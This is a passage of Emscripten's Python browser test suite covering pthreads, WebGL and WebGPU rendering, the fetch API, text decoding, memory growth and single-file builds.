def test_pthread_trap(self):
create_file('pre.js', '''
if (typeof window === 'object' && window) {
window.addEventListener('error', function(e) {
if (e.error && e.error.message.includes('unreachable'))
maybeReportResultToServer("expected exception caught");
else
maybeReportResultToServer("unexpected: " + e);
});
}''')
args = ['-sUSE_PTHREADS',
'-sPROXY_TO_PTHREAD',
'-sEXIT_RUNTIME',
'--profiling-funcs',
'--pre-js=pre.js']
self.btest(test_file('pthread/test_pthread_trap.c'), expected='expected exception caught', args=args)
# Tests MAIN_THREAD_EM_ASM_INT() function call signatures.
def test_main_thread_em_asm_signatures(self):
self.btest_exit(test_file('core/test_em_asm_signatures.cpp'), assert_returncode=121, args=[])
@requires_threads
def test_main_thread_em_asm_signatures_pthreads(self):
self.btest_exit(test_file('core/test_em_asm_signatures.cpp'), assert_returncode=121, args=['-O3', '-sUSE_PTHREADS', '-sPROXY_TO_PTHREAD', '-sASSERTIONS'])
@requires_threads
def test_main_thread_async_em_asm(self):
self.btest_exit(test_file('core/test_main_thread_async_em_asm.cpp'), args=['-O3', '-sUSE_PTHREADS', '-sPROXY_TO_PTHREAD', '-sASSERTIONS'])
@requires_threads
def test_main_thread_em_asm_blocking(self):
create_file('page.html', read_file(test_file('browser/test_em_asm_blocking.html')))
self.compile_btest([test_file('browser/test_em_asm_blocking.cpp'), '-O2', '-o', 'wasm.js', '-sUSE_PTHREADS', '-sPROXY_TO_PTHREAD'])
self.run_browser('page.html', '', '/report_result?8')
# Test that it is possible to send a signal via calling alarm(timeout), which in turn calls to the signal handler set by signal(SIGALRM, func);
def test_sigalrm(self):
self.btest_exit(test_file('test_sigalrm.c'), args=['-O3'])
def test_canvas_style_proxy(self):
self.btest('canvas_style_proxy.c', expected='1', args=['--proxy-to-worker', '--shell-file', test_file('canvas_style_proxy_shell.html'), '--pre-js', test_file('canvas_style_proxy_pre.js')])
def test_canvas_size_proxy(self):
self.btest(test_file('canvas_size_proxy.c'), expected='0', args=['--proxy-to-worker'])
def test_custom_messages_proxy(self):
self.btest(test_file('custom_messages_proxy.c'), expected='1', args=['--proxy-to-worker', '--shell-file', test_file('custom_messages_proxy_shell.html'), '--post-js', test_file('custom_messages_proxy_postjs.js')])
def test_vanilla_html_when_proxying(self):
for opts in [0, 1, 2]:
print(opts)
self.compile_btest([test_file('browser_test_hello_world.c'), '-o', 'test.js', '-O' + str(opts), '--proxy-to-worker'])
create_file('test.html', '<script src="test.js"></script>')
self.run_browser('test.html', None, '/report_result?0')
def test_in_flight_memfile_request(self):
# test the XHR for an asm.js mem init file being in flight already
for o in [0, 1, 2]:
print(o)
opts = ['-O' + str(o), '-sWASM=0']
print('plain html')
self.compile_btest([test_file('in_flight_memfile_request.c'), '-o', 'test.js'] + opts)
create_file('test.html', '<script src="test.js"></script>')
self.run_browser('test.html', None, '/report_result?0') # never when we provide our own HTML like this.
print('default html')
self.btest('in_flight_memfile_request.c', expected='0' if o < 2 else '1', args=opts) # should happen when there is a mem init file (-O2+)
@requires_sync_compilation
def test_binaryen_async(self):
# notice when we use async compilation
script = '''
<script>
// note if we do async compilation
var real_wasm_instantiate = WebAssembly.instantiate;
var real_wasm_instantiateStreaming = WebAssembly.instantiateStreaming;
if (typeof real_wasm_instantiateStreaming === 'function') {
WebAssembly.instantiateStreaming = function(a, b) {
Module.sawAsyncCompilation = true;
return real_wasm_instantiateStreaming(a, b);
};
} else {
WebAssembly.instantiate = function(a, b) {
Module.sawAsyncCompilation = true;
return real_wasm_instantiate(a, b);
};
}
// show stderr for the viewer's fun
err = function(x) {
out('<<< ' + x + ' >>>');
console.log(x);
};
</script>
{{{ SCRIPT }}}
'''
shell_with_script('shell.html', 'shell.html', script)
common_args = ['--shell-file', 'shell.html']
for opts, returncode in [
([], 1),
(['-O1'], 1),
(['-O2'], 1),
(['-O3'], 1),
(['-sWASM_ASYNC_COMPILATION'], 1), # force it on
(['-O1', '-sWASM_ASYNC_COMPILATION=0'], 0), # force it off
]:
print(opts, returncode)
self.btest_exit('binaryen_async.c', assert_returncode=returncode, args=common_args + opts)
# Ensure that compilation still works and is async without instantiateStreaming available
no_streaming = ' <script> WebAssembly.instantiateStreaming = undefined;</script>'
shell_with_script('shell.html', 'shell.html', no_streaming + script)
self.btest_exit('binaryen_async.c', assert_returncode=1, args=common_args)
# Test that implementing Module.instantiateWasm() callback works.
@parameterized({
'': ([],),
'asan': (['-fsanitize=address', '-sINITIAL_MEMORY=128MB'],)
})
def test_manual_wasm_instantiate(self, args=[]):
self.compile_btest([test_file('manual_wasm_instantiate.cpp'), '-o', 'manual_wasm_instantiate.js'] + args)
shutil.copyfile(test_file('manual_wasm_instantiate.html'), 'manual_wasm_instantiate.html')
self.run_browser('manual_wasm_instantiate.html', 'wasm instantiation succeeded', '/report_result?1')
def test_wasm_locate_file(self):
# Test that it is possible to define "Module.locateFile(foo)" function to locate where worker.js will be loaded from.
ensure_dir('cdn')
create_file('shell2.html', read_file(path_from_root('src/shell.html')).replace('var Module = {', 'var Module = { locateFile: function(filename) { if (filename == "test.wasm") return "cdn/test.wasm"; else return filename; }, '))
self.compile_btest([test_file('browser_test_hello_world.c'), '--shell-file', 'shell2.html', '-o', 'test.html'])
shutil.move('test.wasm', Path('cdn/test.wasm'))
self.run_browser('test.html', '', '/report_result?0')
@also_with_threads
def test_utf8_textdecoder(self):
self.btest_exit('benchmark_utf8.cpp', 0, args=['--embed-file', test_file('utf8_corpus.txt') + '@/utf8_corpus.txt', '-sEXPORTED_RUNTIME_METHODS=[UTF8ToString]'])
@also_with_threads
def test_utf16_textdecoder(self):
self.btest_exit('benchmark_utf16.cpp', 0, args=['--embed-file', test_file('utf16_corpus.txt') + '@/utf16_corpus.txt', '-sEXPORTED_RUNTIME_METHODS=[UTF16ToString,stringToUTF16,lengthBytesUTF16]'])
@also_with_threads
def test_TextDecoder(self):
self.btest('browser_test_hello_world.c', '0', args=['-sTEXTDECODER=0'])
just_fallback = os.path.getsize('test.js')
self.btest('browser_test_hello_world.c', '0')
td_with_fallback = os.path.getsize('test.js')
self.btest('browser_test_hello_world.c', '0', args=['-sTEXTDECODER=2'])
td_without_fallback = os.path.getsize('test.js')
# pthread TextDecoder support is more complex due to
# https://github.com/whatwg/encoding/issues/172
# and therefore the expected code size win there is actually a loss
if '-pthread' not in self.emcc_args:
self.assertLess(td_without_fallback, just_fallback)
else:
self.assertGreater(td_without_fallback, just_fallback)
self.assertLess(just_fallback, td_with_fallback)
def test_small_js_flags(self):
self.btest('browser_test_hello_world.c', '0', args=['-O3', '--closure=1', '-sINCOMING_MODULE_JS_API=[]', '-sENVIRONMENT=web'])
# Check an absolute js code size, with some slack.
size = os.path.getsize('test.js')
print('size:', size)
# Note that this size includes test harness additions (for reporting the result, etc.).
self.assertLess(abs(size - 5500), 100)
# Tests that it is possible to initialize and render WebGL content in a pthread by using OffscreenCanvas.
# -DTEST_CHAINED_WEBGL_CONTEXT_PASSING: Tests that it is possible to transfer WebGL canvas in a chain from main thread -> thread 1 -> thread 2 and then init and render WebGL content there.
@no_chrome('see https://crbug.com/961765')
@requires_threads
@requires_offscreen_canvas
@requires_graphics_hardware
def test_webgl_offscreen_canvas_in_pthread(self):
for args in [[], ['-DTEST_CHAINED_WEBGL_CONTEXT_PASSING']]:
self.btest('gl_in_pthread.cpp', expected='1', args=args + ['-sUSE_PTHREADS', '-sPTHREAD_POOL_SIZE=2', '-sOFFSCREENCANVAS_SUPPORT', '-lGL'])
# Tests that it is possible to render WebGL content on a <canvas> on the main thread, after it has once been used to render WebGL content in a pthread first
# -DTEST_MAIN_THREAD_EXPLICIT_COMMIT: Test the same (WebGL on main thread after pthread), but by using explicit .commit() to swap on the main thread instead of implicit "swap when rAF ends" logic
@requires_threads
@requires_offscreen_canvas
@requires_graphics_hardware
@disabled('This test is disabled because current OffscreenCanvas does not allow transfering it after a rendering context has been created for it.')
def test_webgl_offscreen_canvas_in_mainthread_after_pthread(self):
for args in [[], ['-DTEST_MAIN_THREAD_EXPLICIT_COMMIT']]:
self.btest('gl_in_mainthread_after_pthread.cpp', expected='0', args=args + ['-sUSE_PTHREADS', '-sPTHREAD_POOL_SIZE=2', '-sOFFSCREENCANVAS_SUPPORT', '-lGL'])
@requires_threads
@requires_offscreen_canvas
@requires_graphics_hardware
def test_webgl_offscreen_canvas_only_in_pthread(self):
self.btest_exit('gl_only_in_pthread.cpp', args=['-sUSE_PTHREADS', '-sPTHREAD_POOL_SIZE', '-sOFFSCREENCANVAS_SUPPORT', '-lGL', '-sOFFSCREEN_FRAMEBUFFER'])
# Tests that rendering from client side memory without default-enabling extensions works.
@requires_graphics_hardware
def test_webgl_from_client_side_memory_without_default_enabled_extensions(self):
self.btest_exit('webgl_draw_triangle.c', args=['-lGL', '-sOFFSCREEN_FRAMEBUFFER', '-DEXPLICIT_SWAP=1', '-DDRAW_FROM_CLIENT_MEMORY=1', '-sFULL_ES2=1'])
# Tests for WEBGL_multi_draw extension
# For testing WebGL draft extensions like this, if using chrome as the browser,
# We might want to append the --enable-webgl-draft-extensions to the EMTEST_BROWSER env arg.
@requires_graphics_hardware
def test_webgl_multi_draw(self):
self.btest('webgl_multi_draw_test.c', reference='webgl_multi_draw.png',
args=['-lGL', '-sOFFSCREEN_FRAMEBUFFER', '-DMULTI_DRAW_ARRAYS=1', '-DEXPLICIT_SWAP=1'])
self.btest('webgl_multi_draw_test.c', reference='webgl_multi_draw.png',
args=['-lGL', '-sOFFSCREEN_FRAMEBUFFER', '-DMULTI_DRAW_ARRAYS_INSTANCED=1', '-DEXPLICIT_SWAP=1'])
self.btest('webgl_multi_draw_test.c', reference='webgl_multi_draw.png',
args=['-lGL', '-sOFFSCREEN_FRAMEBUFFER', '-DMULTI_DRAW_ELEMENTS=1', '-DEXPLICIT_SWAP=1'])
self.btest('webgl_multi_draw_test.c', reference='webgl_multi_draw.png',
args=['-lGL', '-sOFFSCREEN_FRAMEBUFFER', '-DMULTI_DRAW_ELEMENTS_INSTANCED=1', '-DEXPLICIT_SWAP=1'])
# Tests for base_vertex/base_instance extension
# For testing WebGL draft extensions like this, if using chrome as the browser,
# We might want to append the --enable-webgl-draft-extensions to the EMTEST_BROWSER env arg.
# If testing on Mac, you also need --use-cmd-decoder=passthrough to get this extension.
# Also there is a known bug with Mac Intel baseInstance which can fail producing the expected image result.
@requires_graphics_hardware
def test_webgl_draw_base_vertex_base_instance(self):
for multiDraw in [0, 1]:
for drawElements in [0, 1]:
self.btest('webgl_draw_base_vertex_base_instance_test.c', reference='webgl_draw_instanced_base_vertex_base_instance.png',
args=['-lGL',
'-sMAX_WEBGL_VERSION=2',
'-sOFFSCREEN_FRAMEBUFFER',
'-DMULTI_DRAW=' + str(multiDraw),
'-DDRAW_ELEMENTS=' + str(drawElements),
'-DEXPLICIT_SWAP=1',
'-DWEBGL_CONTEXT_VERSION=2'])
@requires_graphics_hardware
def test_webgl_sample_query(self):
cmd = ['-sMAX_WEBGL_VERSION=2', '-lGL']
self.btest_exit('webgl_sample_query.cpp', args=cmd)
@requires_graphics_hardware
def test_webgl_timer_query(self):
for args in [
# EXT query entrypoints on WebGL 1.0
['-sMAX_WEBGL_VERSION'],
# builtin query entrypoints on WebGL 2.0
['-sMAX_WEBGL_VERSION=2', '-DTEST_WEBGL2'],
# EXT query entrypoints on a WebGL 1.0 context while built for WebGL 2.0
['-sMAX_WEBGL_VERSION=2'],
]:
cmd = args + ['-lGL']
self.btest_exit('webgl_timer_query.cpp', args=cmd)
# Tests that -sOFFSCREEN_FRAMEBUFFER rendering works.
@requires_graphics_hardware
def test_webgl_offscreen_framebuffer(self):
# Tests all the different possible versions of libgl
for threads in [[], ['-sUSE_PTHREADS', '-sPROXY_TO_PTHREAD']]:
for version in [[], ['-sFULL_ES3'], ['-sFULL_ES3']]:
args = ['-lGL', '-sOFFSCREEN_FRAMEBUFFER', '-DEXPLICIT_SWAP=1'] + threads + version
print('with args: %s' % str(args))
self.btest_exit('webgl_draw_triangle.c', args=args)
# Tests that VAOs can be used even if WebGL enableExtensionsByDefault is set to 0.
@requires_graphics_hardware
def test_webgl_vao_without_automatic_extensions(self):
self.btest_exit('test_webgl_no_auto_init_extensions.c', args=['-lGL', '-sGL_SUPPORT_AUTOMATIC_ENABLE_EXTENSIONS=0'])
# Tests that offscreen framebuffer state restoration works
@requires_graphics_hardware
def test_webgl_offscreen_framebuffer_state_restoration(self):
for args in [
# full state restoration path on WebGL 1.0
['-sMAX_WEBGL_VERSION', '-sOFFSCREEN_FRAMEBUFFER_FORBID_VAO_PATH'],
# VAO path on WebGL 1.0
['-sMAX_WEBGL_VERSION'],
['-sMAX_WEBGL_VERSION=2', '-DTEST_WEBGL2=0'],
# VAO path on WebGL 2.0
['-sMAX_WEBGL_VERSION=2', '-DTEST_WEBGL2=1', '-DTEST_ANTIALIAS=1', '-DTEST_REQUIRE_VAO=1'],
# full state restoration path on WebGL 2.0
['-sMAX_WEBGL_VERSION=2', '-DTEST_WEBGL2=1', '-DTEST_ANTIALIAS=1', '-sOFFSCREEN_FRAMEBUFFER_FORBID_VAO_PATH'],
# blitFramebuffer path on WebGL 2.0 (falls back to VAO on Firefox < 67)
['-sMAX_WEBGL_VERSION=2', '-DTEST_WEBGL2=1', '-DTEST_ANTIALIAS=0'],
]:
cmd = args + ['-lGL', '-sOFFSCREEN_FRAMEBUFFER', '-DEXPLICIT_SWAP=1']
self.btest_exit('webgl_offscreen_framebuffer_swap_with_bad_state.c', args=cmd)
# Tests that -sWORKAROUND_OLD_WEBGL_UNIFORM_UPLOAD_IGNORED_OFFSET_BUG rendering works.
@requires_graphics_hardware
def test_webgl_workaround_webgl_uniform_upload_bug(self):
self.btest_exit('webgl_draw_triangle_with_uniform_color.c', args=['-lGL', '-sWORKAROUND_OLD_WEBGL_UNIFORM_UPLOAD_IGNORED_OFFSET_BUG'])
# Tests that using an array of structs in GL uniforms works.
@requires_graphics_hardware
def test_webgl_array_of_structs_uniform(self):
self.btest('webgl_array_of_structs_uniform.c', args=['-lGL', '-sMAX_WEBGL_VERSION=2'], reference='webgl_array_of_structs_uniform.png')
# Tests that if a WebGL context is created in a pthread on a canvas that has not been transferred to that pthread, WebGL calls are then proxied to the main thread
# -DTEST_OFFSCREEN_CANVAS=1: Tests that if a WebGL context is created on a pthread that has the canvas transferred to it via using Emscripten's EMSCRIPTEN_PTHREAD_TRANSFERRED_CANVASES="#canvas", then OffscreenCanvas is used
# -DTEST_OFFSCREEN_CANVAS=2: Tests that if a WebGL context is created on a pthread that has the canvas transferred to it via automatic transferring of Module.canvas when EMSCRIPTEN_PTHREAD_TRANSFERRED_CANVASES is not defined, then OffscreenCanvas is also used
@parameterized({
'': ([False],),
'asyncify': ([True],),
})
@requires_threads
@requires_offscreen_canvas
@requires_graphics_hardware
def test_webgl_offscreen_canvas_in_proxied_pthread(self, asyncify):
cmd = ['-sUSE_PTHREADS', '-sOFFSCREENCANVAS_SUPPORT', '-lGL', '-sGL_DEBUG', '-sPROXY_TO_PTHREAD']
if asyncify:
# given the synchronous render loop here, asyncify is needed to see intermediate frames and
# the gradual color change
cmd += ['-sASYNCIFY', '-DASYNCIFY']
print(str(cmd))
self.btest_exit('gl_in_proxy_pthread.cpp', args=cmd)
@parameterized({
'proxy': (['-sPROXY_TO_PTHREAD'],),
'': ([],),
})
@requires_threads
@requires_graphics_hardware
@requires_offscreen_canvas
def test_webgl_resize_offscreencanvas_from_main_thread(self, args):
for args2 in [[], ['-DTEST_SYNC_BLOCKING_LOOP=1']]:
for args3 in [[], ['-sOFFSCREENCANVAS_SUPPORT', '-sOFFSCREEN_FRAMEBUFFER']]:
cmd = args + args2 + args3 + ['-sUSE_PTHREADS', '-lGL', '-sGL_DEBUG']
print(str(cmd))
self.btest_exit('resize_offscreencanvas_from_main_thread.cpp', args=cmd)
@requires_graphics_hardware
def test_webgl_simple_enable_extensions(self):
for webgl_version in [1, 2]:
for simple_enable_extensions in [0, 1]:
cmd = ['-DWEBGL_CONTEXT_VERSION=' + str(webgl_version),
'-DWEBGL_SIMPLE_ENABLE_EXTENSION=' + str(simple_enable_extensions),
'-sMAX_WEBGL_VERSION=2',
'-sGL_SUPPORT_AUTOMATIC_ENABLE_EXTENSIONS=' + str(simple_enable_extensions),
'-sGL_SUPPORT_SIMPLE_ENABLE_EXTENSIONS=' + str(simple_enable_extensions)]
self.btest_exit('webgl2_simple_enable_extensions.c', args=cmd)
@requires_graphics_hardware
def test_webgpu_basic_rendering(self):
for args in [[], ['-sASSERTIONS', '--closure=1'], ['-sMAIN_MODULE=1']]:
self.btest_exit('webgpu_basic_rendering.cpp', args=['-sUSE_WEBGPU'] + args)
def test_webgpu_get_device(self):
for args in [['-sASSERTIONS', '--closure=1']]:
self.btest_exit('webgpu_get_device.cpp', args=['-sUSE_WEBGPU'] + args)
# Tests the feature that shell html page can preallocate the typed array and place it
# to Module.buffer before loading the script page.
# In this build mode, the -sINITIAL_MEMORY=xxx option will be ignored.
# Preallocating the buffer in this was is asm.js only (wasm needs a Memory).
def test_preallocated_heap(self):
self.btest_exit('test_preallocated_heap.cpp', args=['-sWASM=0', '-sINITIAL_MEMORY=16MB', '-sABORTING_MALLOC=0', '--shell-file', test_file('test_preallocated_heap_shell.html')])
# Tests emscripten_fetch() usage to XHR data directly to memory without persisting results to IndexedDB.
@also_with_wasm2js
def test_fetch_to_memory(self):
# Test error reporting in the negative case when the file URL doesn't exist. (http 404)
self.btest_exit('fetch/to_memory.cpp',
args=['-sFETCH_DEBUG', '-sFETCH', '-DFILE_DOES_NOT_EXIST'])
# Test the positive case when the file URL exists. (http 200)
shutil.copyfile(test_file('gears.png'), 'gears.png')
for arg in [[], ['-sFETCH_SUPPORT_INDEXEDDB=0']]:
self.btest_exit('fetch/to_memory.cpp',
args=['-sFETCH_DEBUG', '-sFETCH'] + arg)
@parameterized({
'': ([],),
'pthread_exit': (['-DDO_PTHREAD_EXIT'],),
})
@no_firefox('https://github.com/emscripten-core/emscripten/issues/16868')
@requires_threads
def test_fetch_from_thread(self, args):
shutil.copyfile(test_file('gears.png'), 'gears.png')
self.btest_exit('fetch/from_thread.cpp',
args=args + ['-sUSE_PTHREADS', '-sPROXY_TO_PTHREAD', '-sFETCH_DEBUG', '-sFETCH', '-DFILE_DOES_NOT_EXIST'],
also_wasm2js=True)
@also_with_wasm2js
def test_fetch_to_indexdb(self):
shutil.copyfile(test_file('gears.png'), 'gears.png')
self.btest_exit('fetch/to_indexeddb.cpp',
args=['-sFETCH_DEBUG', '-sFETCH'])
# Tests emscripten_fetch() usage to persist an XHR into IndexedDB and subsequently load up from there.
@also_with_wasm2js
def test_fetch_cached_xhr(self):
shutil.copyfile(test_file('gears.png'), 'gears.png')
self.btest_exit('fetch/cached_xhr.cpp',
args=['-sFETCH_DEBUG', '-sFETCH'])
# Tests that response headers get set on emscripten_fetch_t values.
@no_firefox('https://github.com/emscripten-core/emscripten/issues/16868')
@also_with_wasm2js
@requires_threads
def test_fetch_response_headers(self):
shutil.copyfile(test_file('gears.png'), 'gears.png')
self.btest_exit('fetch/response_headers.cpp', args=['-sFETCH_DEBUG', '-sFETCH', '-sUSE_PTHREADS', '-sPROXY_TO_PTHREAD'])
# Test emscripten_fetch() usage to stream a XHR in to memory without storing the full file in memory
@also_with_wasm2js
def test_fetch_stream_file(self):
self.skipTest('moz-chunked-arraybuffer was firefox-only and has been removed')
# Strategy: create a large 128MB file, and compile with a small 16MB Emscripten heap, so that the tested file
# won't fully fit in the heap. This verifies that streaming works properly.
s = '12345678'
for i in range(14):
s = s[::-1] + s # length of str will be 2^17=128KB
with open('largefile.txt', 'w') as f:
for i in range(1024):
f.write(s)
self.btest_exit('fetch/stream_file.cpp',
args=['-sFETCH_DEBUG', '-sFETCH', '-sINITIAL_MEMORY=536870912'])
def test_fetch_headers_received(self):
self.btest_exit('fetch/headers_received.cpp', args=['-sFETCH_DEBUG', '-sFETCH'])
# Tests emscripten_fetch() usage in synchronous mode when used from the main
# thread proxied to a Worker with -sPROXY_TO_PTHREAD option.
@no_firefox('https://github.com/emscripten-core/emscripten/issues/16868')
@requires_threads
def test_fetch_sync_xhr(self):
shutil.copyfile(test_file('gears.png'), 'gears.png')
self.btest_exit('fetch/sync_xhr.cpp', args=['-sFETCH_DEBUG', '-sFETCH', '-sUSE_PTHREADS', '-sPROXY_TO_PTHREAD'])
# Tests emscripten_fetch() usage when user passes none of the main 3 flags (append/replace/no_download).
# In that case, in append is implicitly understood.
@no_firefox('https://github.com/emscripten-core/emscripten/issues/16868')
@requires_threads
def test_fetch_implicit_append(self):
shutil.copyfile(test_file('gears.png'), 'gears.png')
self.btest_exit('fetch/example_synchronous_fetch.c', args=['-sFETCH', '-sUSE_PTHREADS', '-sPROXY_TO_PTHREAD'])
# Tests synchronous emscripten_fetch() usage from wasm pthread in fastcomp.
@no_firefox('https://github.com/emscripten-core/emscripten/issues/16868')
@requires_threads
def test_fetch_sync_xhr_in_wasm(self):
shutil.copyfile(test_file('gears.png'), 'gears.png')
self.btest_exit('fetch/example_synchronous_fetch.c', args=['-sFETCH', '-sUSE_PTHREADS', '-sPROXY_TO_PTHREAD'])
# Tests that the Fetch API works for synchronous XHRs when used with --proxy-to-worker.
@no_firefox('https://github.com/emscripten-core/emscripten/issues/16868')
@also_with_wasm2js
@requires_threads
def test_fetch_sync_xhr_in_proxy_to_worker(self):
shutil.copyfile(test_file('gears.png'), 'gears.png')
self.btest_exit('fetch/sync_xhr.cpp',
args=['-sFETCH_DEBUG', '-sFETCH', '--proxy-to-worker'])
# Tests waiting on EMSCRIPTEN_FETCH_WAITABLE request from a worker thread
@unittest.skip("emscripten_fetch_wait relies on an asm.js-based web worker")
@requires_threads
def test_fetch_sync_fetch_in_main_thread(self):
shutil.copyfile(test_file('gears.png'), 'gears.png')
self.btest_exit('fetch/sync_fetch_in_main_thread.cpp', args=['-sFETCH_DEBUG', '-sFETCH', '-sWASM=0', '-sUSE_PTHREADS', '-sPROXY_TO_PTHREAD'])
@requires_threads
@disabled('https://github.com/emscripten-core/emscripten/issues/16746')
def test_fetch_idb_store(self):
self.btest_exit('fetch/idb_store.cpp', args=['-sUSE_PTHREADS', '-sFETCH', '-sWASM=0', '-sPROXY_TO_PTHREAD'])
@requires_threads
@disabled('https://github.com/emscripten-core/emscripten/issues/16746')
def test_fetch_idb_delete(self):
shutil.copyfile(test_file('gears.png'), 'gears.png')
self.btest_exit('fetch/idb_delete.cpp', args=['-sUSE_PTHREADS', '-sFETCH_DEBUG', '-sFETCH', '-sWASM=0', '-sPROXY_TO_PTHREAD'])
@requires_threads
def test_pthread_locale(self):
self.emcc_args.append('-I' + path_from_root('system/lib/libc/musl/src/internal'))
self.emcc_args.append('-I' + path_from_root('system/lib/pthread'))
for args in [
[],
['-sUSE_PTHREADS', '-sPTHREAD_POOL_SIZE=2'],
]:
print("Testing with: ", args)
self.btest_exit('pthread/test_pthread_locale.c', args=args)
# Tests the Emscripten HTML5 API emscripten_set_canvas_element_size() and
# emscripten_get_canvas_element_size() functionality in singlethreaded programs.
def test_emscripten_set_canvas_element_size(self):
self.btest_exit('emscripten_set_canvas_element_size.c')
# Test that emscripten_get_device_pixel_ratio() is callable from pthreads (and proxies to main
# thread to obtain the proper window.devicePixelRatio value).
@requires_threads
def test_emscripten_get_device_pixel_ratio(self):
for args in [[], ['-sUSE_PTHREADS', '-sPROXY_TO_PTHREAD']]:
self.btest_exit('emscripten_get_device_pixel_ratio.c', args=args)
# Tests that emscripten_run_script() variants of functions work in pthreads.
@requires_threads
def test_pthread_run_script(self):
for args in [[], ['-sUSE_PTHREADS', '-sPROXY_TO_PTHREAD']]:
self.btest_exit(test_file('pthread/test_pthread_run_script.cpp'), args=['-O3'] + args)
# Tests emscripten_set_canvas_element_size() and OffscreenCanvas functionality in different build configurations.
@requires_threads
@requires_graphics_hardware
def test_emscripten_animate_canvas_element_size(self):
for args in [
['-DTEST_EMSCRIPTEN_SET_MAIN_LOOP=1'],
['-DTEST_EMSCRIPTEN_SET_MAIN_LOOP=1', '-sPROXY_TO_PTHREAD', '-sUSE_PTHREADS', '-s', 'OFFSCREEN_FRAMEBUFFER=1'],
['-DTEST_EMSCRIPTEN_SET_MAIN_LOOP=1', '-sPROXY_TO_PTHREAD', '-sUSE_PTHREADS', '-s', 'OFFSCREEN_FRAMEBUFFER=1', '-DTEST_EXPLICIT_CONTEXT_SWAP=1'],
['-DTEST_EXPLICIT_CONTEXT_SWAP=1', '-sPROXY_TO_PTHREAD', '-sUSE_PTHREADS', '-s', 'OFFSCREEN_FRAMEBUFFER=1'],
['-DTEST_EXPLICIT_CONTEXT_SWAP=1', '-sPROXY_TO_PTHREAD', '-sUSE_PTHREADS', '-s', 'OFFSCREEN_FRAMEBUFFER=1', '-DTEST_MANUALLY_SET_ELEMENT_CSS_SIZE=1'],
['-DTEST_EMSCRIPTEN_SET_MAIN_LOOP=1', '-sOFFSCREENCANVAS_SUPPORT'],
]:
cmd = ['-lGL', '-O3', '-g2', '--shell-file', test_file('canvas_animate_resize_shell.html'), '-sGL_DEBUG', '--threadprofiler', '-sASSERTIONS'] + args
print(' '.join(cmd))
self.btest_exit('canvas_animate_resize.cpp', args=cmd)
# Tests the absolute minimum pthread-enabled application.
@parameterized({
'': ([],),
'O3': (['-O3'],)
})
@requires_threads
def test_pthread_hello_thread(self, opts):
for modularize in [[], ['-sMODULARIZE', '-sEXPORT_NAME=MyModule', '--shell-file', test_file('shell_that_launches_modularize.html')]]:
self.btest_exit(test_file('pthread/hello_thread.c'), args=['-sUSE_PTHREADS'] + modularize + opts)
# Tests that a pthreads build of -sMINIMAL_RUNTIME works well in different build modes
@parameterized({
'': ([],),
'modularize': (['-sMODULARIZE', '-sEXPORT_NAME=MyModule'],),
'O3': (['-O3'],),
'O3_modularize': (['-O3', '-sMODULARIZE', '-sEXPORT_NAME=MyModule'],),
'O3_modularize_MINIMAL_RUNTIME_2': (['-O3', '-sMODULARIZE', '-sEXPORT_NAME=MyModule', '-sMINIMAL_RUNTIME=2'],),
})
def test_minimal_runtime_hello_thread(self, opts):
self.btest_exit(test_file('pthread/hello_thread.c'), args=['--closure=1', '-sMINIMAL_RUNTIME', '-sUSE_PTHREADS'] + opts)
# Tests memory growth in pthreads mode, but still on the main thread.
@requires_threads
def test_pthread_growth_mainthread(self):
self.emcc_args.remove('-Werror')
def run(emcc_args=[]):
self.btest_exit(test_file('pthread/test_pthread_memory_growth_mainthread.c'), args=['-sUSE_PTHREADS', '-sPTHREAD_POOL_SIZE=2', '-sALLOW_MEMORY_GROWTH', '-sINITIAL_MEMORY=32MB', '-sMAXIMUM_MEMORY=256MB'] + emcc_args, also_wasm2js=False)
run()
run(['-sPROXY_TO_PTHREAD'])
# Tests memory growth in a pthread.
@requires_threads
def test_pthread_growth(self):
self.emcc_args.remove('-Werror')
def run(emcc_args=[]):
self.btest_exit(test_file('pthread/test_pthread_memory_growth.c'), args=['-sUSE_PTHREADS', '-sPTHREAD_POOL_SIZE=2', '-sALLOW_MEMORY_GROWTH', '-sINITIAL_MEMORY=32MB', '-sMAXIMUM_MEMORY=256MB', '-g'] + emcc_args, also_wasm2js=False)
run()
run(['-sASSERTIONS'])
run(['-sPROXY_TO_PTHREAD'])
# Tests that time in a pthread is relative to the main thread, so measurements
# on different threads are still monotonic, as if checking a single central
# clock.
@requires_threads
def test_pthread_reltime(self):
self.btest_exit(test_file('pthread/test_pthread_reltime.cpp'), args=['-sUSE_PTHREADS', '-sPTHREAD_POOL_SIZE'])
# Tests that it is possible to load the main .js file of the application manually via a Blob URL, and still use pthreads.
@requires_threads
def test_load_js_from_blob_with_pthreads(self):
# TODO: enable this with wasm, currently pthreads/atomics have limitations
self.set_setting('EXIT_RUNTIME')
self.compile_btest([test_file('pthread/hello_thread.c'), '-sUSE_PTHREADS', '-o', 'hello_thread_with_blob_url.js'], reporting=Reporting.JS_ONLY)
shutil.copyfile(test_file('pthread/main_js_as_blob_loader.html'), 'hello_thread_with_blob_url.html')
self.run_browser('hello_thread_with_blob_url.html', 'hello from thread!', '/report_result?exit:0')
# Tests that base64 utils work in browser with no native atob function
def test_base64_atob_fallback(self):
create_file('test.c', r'''
#include <stdio.h>
#include <emscripten.h>
int main() {
return 0;
}
''')
# generate a dummy file
create_file('dummy_file', 'dummy')
# compile the code with the modularize feature and the preload-file option enabled
self.compile_btest(['test.c', '-sEXIT_RUNTIME', '-sMODULARIZE', '-sEXPORT_NAME="Foo"', '--preload-file', 'dummy_file', '-sSINGLE_FILE'])
create_file('a.html', '''
<script>
atob = undefined;
fetch = undefined;
</script>
<script src="a.out.js"></script>
<script>
var foo = Foo();
</script>
''')
self.run_browser('a.html', '...', '/report_result?exit:0')
# Tests that SINGLE_FILE works as intended in generated HTML (with and without Worker)
def test_single_file_html(self):
self.btest('single_file_static_initializer.cpp', '19', args=['-sSINGLE_FILE'], also_proxied=True)
self.assertExists('test.html')
self.assertNotExists('test.js')
self.assertNotExists('test.worker.js')
self.assertNotExists('test.wasm')
self.assertNotExists('test.mem')
# Tests that SINGLE_FILE works as intended in generated HTML with MINIMAL_RUNTIME
def test_minimal_runtime_single_file_html(self):
for wasm in [0, 1]:
for opts in [[], ['-O3']]:
self.btest('single_file_static_initializer.cpp', '19', args=opts + ['-sMINIMAL_RUNTIME', '-sSINGLE_FILE', '-sWASM=' + str(wasm)])
self.assertExists('test.html')
self.assertNotExists('test.js')
self.assertNotExists('test.wasm')
self.assertNotExists('test.asm.js')
self.assertNotExists('test.mem')
self.assertNotExists('test.js')
self.assertNotExists('test.worker.js')
# Tests that SINGLE_FILE works when built with ENVIRONMENT=web and Closure enabled (#7933)
def test_single_file_in_web_environment_with_closure(self):
